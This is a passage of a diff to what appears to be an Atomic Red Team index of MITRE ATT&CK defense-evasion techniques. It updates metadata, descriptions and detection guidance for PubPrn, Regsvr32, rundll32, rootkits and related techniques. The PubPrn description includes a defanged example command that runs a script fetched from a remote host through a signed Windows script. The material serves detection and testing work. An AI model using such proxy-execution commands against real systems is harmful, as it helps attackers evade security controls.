to determine if a process is performing actions it usually does not, such
as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - API monitoring
+ - File monitoring
+ - DLL monitoring
+ - Process monitoring
+ - Named Pipes
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Christiaan Beek, @ChristiaanBeek
+ - Ryan Becwar
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -28898,7 +29781,7 @@ defense-evasion:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -28938,13 +29821,14 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:27:52.470Z'
+ modified: '2020-06-20T22:24:56.734Z'
created: '2020-01-14T01:33:19.065Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system
call should not generate large amounts of data due to their specialized nature,
and can be a very effective method to detect some of the common process injection
@@ -28953,12 +29837,10 @@ defense-evasion:
behavior to determine if a process is performing actions it usually does not,
such as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - System calls
- - Process monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1216.001:
technique:
@@ -28975,7 +29857,7 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: PubPrn
description: |-
- Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
+ Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.
id: attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58
@@ -28983,20 +29865,20 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T19:39:37.206Z'
+ modified: '2020-06-08T23:36:30.648Z'
created: '2020-02-03T16:49:57.788Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
parameters for scripts like PubPrn.vbs that may be used to proxy execution
of malicious files.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
identifier: T1216.001
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
@@ -29058,33 +29940,9 @@ defense-evasion:
phase_name: persistence
modified: '2020-03-30T13:47:29.922Z'
created: '2017-05-31T21:31:18.867Z'
- x_mitre_contributors:
- - Praetorian
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- - Office 365
- - SaaS
- - Azure AD
- x_mitre_detection: |-
- Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
-
- Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
-
- If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
-
- For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
- x_mitre_defense_bypassed:
- - Network intrusion detection system
- - Anti-virus
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '3.0'
x_mitre_data_sources:
- Office 365 account logs
- Azure activity logs
@@ -29097,9 +29955,33 @@ defense-evasion:
- File monitoring
- Authentication logs
- Binary file metadata
- x_mitre_version: '3.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_defense_bypassed:
+ - Network intrusion detection system
+ - Anti-virus
+ x_mitre_detection: |-
+ Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
+
+ Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
+
+ If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
+
+ For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ - Office 365
+ - SaaS
+ - Azure AD
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_contributors:
+ - Praetorian
atomic_tests: []
T1218.009:
technique:
@@ -29107,7 +29989,7 @@ defense-evasion:
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
- Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
+ Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
name: Regsvcs/Regasm
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -29134,29 +30016,29 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:50:56.613Z'
+ modified: '2020-06-20T22:36:37.411Z'
created: '2020-01-23T19:42:16.439Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Process whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Casey Smith
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and
Regasm.exe with prior history of known good arguments and executed binaries
to determine anomalous and potentially adversarial activity. Command arguments
used before and after Regsvcs.exe or Regasm.exe invocation may also be useful
in determining the origin and purpose of the binary being executed.
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- x_mitre_contributors:
- - Casey Smith
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.009
atomic_tests:
- name: Regasm Uninstall Method Call Test
@@ -29237,7 +30119,7 @@ defense-evasion:
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
- Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
+ Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -29268,32 +30150,32 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:56:13.129Z'
+ modified: '2020-06-20T22:37:32.931Z'
created: '2020-01-23T19:52:17.414Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Anti-virus
- - Process whitelisting
- x_mitre_permissions_required:
- - Administrator
- - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Casey Smith
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
x_mitre_detection: 'Use process monitoring to monitor the execution and arguments
of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history
of known good arguments and loaded files to determine anomalous and potentially
adversarial activity. Command arguments used before and after the regsvr32.exe
invocation may also be useful in determining the origin and purpose of the
script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)'
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- x_mitre_contributors:
- - Casey Smith
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Anti-virus
+ - Application control
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.010
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
@@ -29434,15 +30316,8 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-02-10T20:03:11.691Z'
created: '2020-02-10T20:03:11.691Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'If file names are mismatched between the file name on disk
and that of the binary''s PE metadata, this is a likely indicator that a binary
was renamed after it was compiled. Collecting and comparing disk and resource
@@ -29453,8 +30328,15 @@ defense-evasion:
the command-line arguments that are known to be used and are distinct because
it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading
Update)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Binary file metadata
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1036.003
atomic_tests:
- name: Masquerading as Windows LSASS process
@@ -29667,21 +30549,12 @@ defense-evasion:
del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
name: command_prompt
- T1536:
+ T1578.004:
technique:
- id: attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c
- description: |-
- An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
-
- Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)
- name: Revert Cloud Instance
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- - external_id: T1536
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1536
+ - source_name: mitre-attack
+ external_id: T1578.004
+ url: https://attack.mitre.org/techniques/T1578/004
- source_name: Tech Republic - Restore AWS Snapshots
url: https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/
description: Hardiman, N.. (2012, March 20). Backing up and restoring snapshots
@@ -29690,15 +30563,25 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Revert Cloud Instance
+ description: |-
+ An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
+
+ Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)
+ id: attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T19:32:04.592Z'
- created: '2019-09-04T14:37:07.959Z'
+ modified: '2020-06-17T17:36:24.531Z'
+ created: '2020-06-16T18:42:20.734Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- - Administrator
x_mitre_detection: Establish centralized logging of instance activity, which
can be used to monitor and review system events even after reverting to a
snapshot, rolling back changes, or changing persistence/type of storage. Monitor
@@ -29708,20 +30591,34 @@ defense-evasion:
is logged with the change (e.g., tag or header) if supported by the cloud
provider, to help distinguish valid, expected actions from malicious ones.
x_mitre_data_sources:
- - AWS CloudTrail logs
- - Azure activity logs
- Stackdriver logs
- x_mitre_version: '1.1'
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
x_mitre_contributors:
- Netskope
x_mitre_platforms:
- AWS
- GCP
- Azure
- x_mitre_is_subtechnique: false
atomic_tests: []
T1036.002:
technique:
+ created: '2020-02-10T19:55:29.385Z'
+ modified: '2020-03-29T20:16:36.316Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69
+ description: |-
+ Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.
+
+ A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
+ name: Right-to-Left Override
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1036.002
@@ -29739,21 +30636,6 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Right-to-Left Override
- description: |-
- Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.
-
- A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
- id: attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T20:16:36.316Z'
- created: '2020-02-10T19:55:29.385Z'
x_mitre_platforms:
- Linux
- macOS
@@ -29811,16 +30693,11 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-19T21:04:12.164Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Vincent Le Toux
- x_mitre_data_sources:
- - API monitoring
- - Authentication logs
- - Network protocol analysis
- - Packet capture
- x_mitre_defense_bypassed:
- - Log analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
@@ -29829,11 +30706,16 @@ defense-evasion:
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Log analysis
+ x_mitre_data_sources:
+ - API monitoring
+ - Authentication logs
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_version: '2.0'
identifier: T1207
atomic_tests:
- name: DCShadow - Mimikatz
@@ -29895,35 +30777,35 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T23:30:21.364Z'
+ modified: '2020-06-20T22:29:55.496Z'
created: '2017-05-31T21:30:26.496Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - BIOS
- - MBR
- - System calls
- x_mitre_defense_bypassed:
- - File monitoring
- - Host intrusion prevention systems
- - Process whitelisting
- - Signature-based detection
- - System access controls
- - Whitelisting by file name or path
- - Anti-virus
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
x_mitre_detection: 'Some rootkit protections may be built into anti-virus or
operating system software. There are dedicated rootkit detection tools that
look for specific types of rootkit behavior. Monitor for the existence of
unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia
Rootkit)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - File monitoring
+ - Host intrusion prevention systems
+ - Application control
+ - Signature-based detection
+ - System access controls
+ - Application control by file name or path
+ - Anti-virus
+ x_mitre_data_sources:
+ - BIOS
+ - MBR
+ - System calls
+ x_mitre_version: '1.1'
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
@@ -30038,11 +30920,74 @@ defense-evasion:
'
name: command_prompt
+ T1564.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1564.006
+ url: https://attack.mitre.org/techniques/T1564/006
+ - source_name: SingHealth Breach Jan 2019
+ url: https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx
+ description: Committee of Inquiry into the Cyber Attack on SingHealth. (2019,
+ January 10). Public Report of the Committee of Inquiry into the Cyber Attack
+ on Singapore Health Services Private Limited's Patient Database. Retrieved
+ June 29, 2020.
+ - source_name: Sophos Ragnar May 2020
+ url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+ description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
+ virtual machine to dodge security. Retrieved June 29, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Run Virtual Instance
+ description: |-
+ Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
+
+ Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
+ id: attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-06T19:03:40.330Z'
+ created: '2020-06-29T15:36:41.535Z'
+ x_mitre_detection: "Consider monitoring for files and processes associated with
+ running a virtual instance, such as binary files associated with common virtualization
+ technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring
+ for process command-line arguments that may be atypical for benign use of
+ virtualization software. Usage of virtualization binaries or command-line
+ arguments associated with running a headless (in the background with no UI)
+ virtual instance may be especially suspect. Network adapter information may
+ also be helpful in detecting the use of virtual instances.\n\nIf virtualization
+ software is installed by the adversary, the Registry may provide detection
+ opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003),
+ with respect to virtualization software. \n\nBenign usage of virtualization
+ technology is common in enterprise environments, data and events should not
+ be viewed in isolation, but as part of a chain of behavior."
+ x_mitre_contributors:
+ - Janantha Marasinghe
+ - Menachem Shafran, XM Cyber
+ x_mitre_data_sources:
+ - Packet capture
+ - Host network interface
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
T1218.011:
technique:
id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
description: |-
- Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
+ Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
@@ -30067,32 +31012,32 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:34:07.002Z'
+ modified: '2020-06-20T22:31:42.113Z'
created: '2020-01-23T18:03:46.248Z'
- x_mitre_contributors:
- - Casey Smith
- - Ricardo Dias
- x_mitre_data_sources:
- - DLL monitoring
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
- - Anti-virus
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of rundll32.exe. Compare recent invocations of rundll32.exe with prior history
of known good arguments and loaded DLLs to determine anomalous and potentially
adversarial activity. Command arguments used with the rundll32.exe invocation
may also be useful in determining the origin and purpose of the DLL being
loaded.
- x_mitre_platforms:
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Casey Smith
+ - Ricardo Dias
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
@@ -30281,24 +31226,24 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-03-26T21:49:31.964Z'
created: '2020-02-18T18:34:49.414Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Authentication logs
- - API monitoring
+ x_mitre_contributors:
+ - Alain Homewood, Insomnia Security
+ - Vincent Le Toux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
